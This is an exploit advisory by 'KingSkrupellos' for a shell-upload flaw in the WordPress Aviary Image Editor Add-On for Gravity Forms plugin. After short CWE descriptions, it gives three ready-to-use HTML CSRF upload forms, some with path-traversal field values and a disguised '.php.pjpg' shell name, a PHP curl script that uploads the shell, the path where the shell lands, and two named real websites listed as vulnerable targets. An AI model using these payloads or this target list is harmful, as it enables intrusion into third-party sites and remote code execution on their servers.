#################################################################### # Exploit Title : WordPress Aviary Image Editor Add-On For Gravity Forms Plugins 3.0 Beta R7 CSRF Shell Upload Vulnerability # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Date : 22/03/2020 # Vendor Homepage : wordpress.org # Sofware Link : wordpress.org/plugins/aviary-image-editor-add-on-for-gravity-forms/ # Software Affected Version : 3.0 (Beta r7) and other versions # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # Vulnerability Type : CWE-352 [ Cross-Site Request Forgery (CSRF) ] CWE-264 [ Permissions, Privileges, and Access Controls ] CWE-434 [ Unrestricted Upload of File with Dangerous Type ] # PacketStormSecurity : packetstormsecurity.com/files/authors/13968 # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/ # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos #################################################################### # Impact : *********** The Aviary Image Editor Add-on For Gravity Forms plugin for WordPress is prone to an arbitrary-file-upload vulnerability. An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. Aviary Image Editor Add-on For Gravity Forms 3.0 (beta) is vulnerable; other versions may also be affected. CWE-352: Cross-Site Request Forgery (CSRF) ****************************************** The web application does not, or can not, sufficiently verify whether a well-formed, valid, consistent request was intentionally provided by the user who submitted the request. When a web server is designed to receive a request from a client without any mechanism for verifying that it was intentionally sent, then it might be possible for an attacker to trick a client into making an unintentional request to the web server which will be treated as an authentic request. This can be done via a URL, image load, XMLHttpRequest, etc. and can result in exposure of data or unintended code execution. CWE-264: Permissions, Privileges, and Access Controls ************************************************** Weaknesses in this category are related to the management of permissions, privileges, and other security features that are used to perform access control. CWE-434: Unrestricted Upload of File with Dangerous Type **************************************************** The software allows the attacker to upload or transfer files of dangerous types that can be automatically processed within the product's environment. #################################################################### # Arbitrary File Upload / Unauthorized File Insert / Shell Upload Exploit : *************************************************************** CSRF Cross Site Request Forgery Exploiter 1 => ****************************************** <form method="POST" action="VULNERABLEWEBSITEHERE/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php" enctype="multipart/form-data"> <input type="file" name="files[]" /><button>Upload</button> </form> # CSRF Cross Site Request Forgery Exploit 2 => **************************************** <title>WordPress Aviary Image Editor Add-On For Gravity Forms Plugins Exploiter</title> <form action="http://[VULNERABLEWEBSITE]/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php" method="post" enctype="multipart/form-data"> <body background=" "> <input type="file" name="file" id="file"><br> <input name="form_id" value="../../../" type=hidden"> <input name="name" value="kingskrupellos.php.pjpg" type=''hidden"> <input name="gform_unique_id" value="../../" type="hidden"> <input name="field_id" value="" type="hidden"> <input type="submit" name="gform_submit" value="submit"> # CSRF Cross Site Request Forgery Exploit 3=> **************************************** <html> <body> <form action="http://www.[VULNERABLESITE].gov/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php" method="POST" enctype="multipart/form-data"> <input type="hidden" name="task" value="drm_add_new_album" /> <input type="hidden" name="album_name" value="WordPress Aviary Image Editor Add-On For Gravity Forms Plugins Exploiter Cyberizm" /> <input type="hidden" name="album_desc" value="WordPress Aviary Image Editor Add-On For Gravity Forms Plugins Exploiter Cyberizm" /> <input type="file" name="album_img" value="" /> <input type="submit" value="Submit" /> </form> </body> </html> </form> PHP Exploiter Code : ********************* <?php $uploadfile="kingskrupellos.php.pjpg"; /// KingSkrupellos ! Cyberizm Digital Security Army ^_^ $ch = curl_init("http://127.0.0.1/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('file'=>"@$uploadfile")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?> # Vulnerability Error : ******************** {"status":"error","message":"Unsupported File Type. Supported files","code":null} {"status":"error","message":"Unsupported File Type. Supported files"} Directory File Path : ****************** /wp-content/uploads/gform_aviary/_[SHELL].php.pjpg #################################################################### # Example Vulnerable Sites : ************************ [+] solicitud.tenmas.es/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php [+] rbmlumber.com/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php #################################################################### # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ####################################################################